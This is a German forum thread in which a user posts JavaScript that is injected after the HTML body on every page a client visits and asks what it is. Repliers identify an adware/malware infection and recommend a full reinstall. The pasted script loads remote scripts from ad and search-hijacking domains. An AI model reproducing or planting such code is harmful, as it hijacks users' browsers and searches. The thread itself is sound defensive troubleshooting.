Schadcode??? Bitte um Analyse.

[locke821]

Moin alle zusammen!

Ein Kollege von mir hat grade den Fall, dass bei einem Kunden von uns immer, egal welche Site aufgerufen wird und auch egal mit welchem Browser, NACH dem HTML-Body ein (so denke ich) Java-Script anhängt.

Leider sind meine Programmierkenntnisse noch nicht sooooo ausgereift, dass ich das "anständig" bewerten könnte.

Ich bin über jede Hilfe sehr dankbar!!!

Hier der Code:

<script>

var id=2496806021;

var aff=10000;

var sid=0;

function INCL_isIFramed()

{

return (top !== self);

}

function INCL_checkinternals()

{

var h = document.location.hostname;

return (/search\.kalloutsearch\d\.com/i.test(h) == true ||

/search\.adbar\d\.com/i.test(h) == true ||

h.indexOf('search.runclips.com') != -1 ||

h.indexOf('search.searchnowdirect.com') != -1);

}

function INCL_checkdml()

{

var h = document.location.hostname;

return (h.indexOf("google")!=-1 ||

h.indexOf("facebook.com")!=-1 ||

h.indexOf("yahoo.com")!=-1 ||

h.indexOf("bing.com")!=-1 ||

h.indexOf("ask.com")!=-1 ||

h.indexOf("listenersguide.org.uk")!=-1);

}

function INCL_loadScript(src)

{

if (window.location.protocol == 'https:' && src.indexOf('http:') == 0)

return;

var script = document.createElement("script");

script.src = src;

script.characterSet = "utf-8";

script.type = "text/javascript";

(document.head||document.documentElement).appendChild(script);

}

if (!INCL_isIFramed() && !INCL_checkinternals())

{

if (!INCL_checkdml()) {

var INLDM_cfg = { fi : 4603, fd : 0,

fddm: 'xml.cpchero.biz',

sttcdm: 'static.cpchero.biz',

inlsrhdm: 'sonicsearchonline.biz' };

INCL_loadScript('https://hostmyjs.biz/scripts/inl_dmmtch2.min.js');

INCL_loadScript('https://in.admedia.com/?id=ODkoOCI&subid=36');

}

INCL_loadScript('http://i.websuggestorjs.info/sugg/javascript.js?channel=js36');

INCL_loadScript('https://cdncache1-a.akamaihd.net/loaders/1247/l.js?aoi=1311798366&pid=1247&zoneid=52222');

window.dmadbar_settings = {dm_standalone : true, dmpd : 2, fd :

4723, fd2: 4604, xmlfeed : 'http://xml.cpchero.biz/search' , search_url

:

'http://hostmysearch.com/?prt=yhs1Danta2&errUrl=http://www.yahoo.com&keywords='

, script_base : 'https://hostmyjs.biz/scripts/adbar' };

INCL_loadScript('https://hostmyjs.biz/scripts/adbar/adbar.js');

}

</script>

[Guybrush Threepwood]

Das läd halt irgendwelche anderen Scripte nach die man ebenfalls analysieren müsste wenn man rausfinden wollte was das genau macht.

Warum aber ist das relevant? Das System ist offensichtlich von Viren befallen und da gibts nur eine Sache zu tun: Platt machen, neu installieren, Backup einspielen und durch Patches, Sicherheitssoftware, Konfigurieren und Schulen der Benutzer die Gefahr eines erneuten Befalls einschränken.

[locke821]

Sowas hatte ich mir schon fast gedacht. Ich hatte eigentlich gehofft das ganze OHNE Neuinstallation hinzukriegen. Aber schon mal recht herzlichen Dank für die schnelle Antwort.

Was mich nur auch mal interesieren würde: irgendwo muss doch eine (ich sag mal) Anweisung liegen, die das Script anheftet. Wo könnte die denn zu finden sein?

Bearbeitet 4. Dezember 2012 von locke821

[afo]

Was mich nur auch mal interesieren würde: irgendwo muss doch eine (ich sag mal) Anweisung liegen, die das Script anheftet. Wo könnte die denn zu finden sein?

Das kann alles sein. Das kann einfach ein Browseraddon sein. Das kann ein Service sein, der als Proxy fungiert. Das kann sein, dass ein "böser" Server als Proxy eingetragen wurde.

Aber selbst wenn du das Programm findest und löschst kannst du nicht sicher sein, dass dieses nicht einfach nur von einem anderen Schadprogramm wieder plaziert wird.

Lesestoff:

Help: I Got Hacked. Now What Do I Do?

You can’t clean a compromised system by removing the back doors. You can never guarantee that you found all the back doors the attacker put in. The fact that you can’t find any more may only mean you don’t know where to look, or that the system is so compromised that what you are seeing is not actually what is there.